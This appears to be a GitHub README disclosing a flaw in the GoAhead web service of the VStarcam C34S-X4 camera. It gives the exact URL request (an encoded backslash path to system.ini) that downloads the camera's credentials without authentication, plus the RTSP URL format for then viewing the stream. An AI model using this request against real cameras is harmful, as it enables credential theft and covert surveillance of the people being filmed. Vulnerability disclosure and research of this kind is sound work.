You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The Vulnerability of GoAhead Service on VStarcam C34S-X4 that allows you to download system.ini configuration file and get login and password.
!WARNING!
The author is trying to draw the attention of the developers to the problem and I am not responsible for the harm caused to you or by you.
IMPLEMENTATION
Еo perform the vulnerability, you must log in to the camera interface without authorization. Then, after the forward slash, you must add %5C%5Csystem.ini
and the file will start downloading. When you open the file, you will see your username and password written together. I have already written a small program
that interacts with the ONVIF protocol and receives images from the camera and a link to the RTSP stream.
2) You can go to you browser and enter this link https://ip:port/%5C%5Csystem.ini
(You must change ip to address of camera and port to port that web-server run on).
and you get links to snapshots and RTSP stream link.
To get stream you have to specify login and password like this: rtsp://username:password@ip:port/path/to/stream In my case link looks like
this rtsp://admin:888888@192.168.0.58:554/udp/av0_1
About
The Vulnerability of GoAhead Service on VStarcam C34S-X4 that allows you to download system.ini configuration file and get login and password.
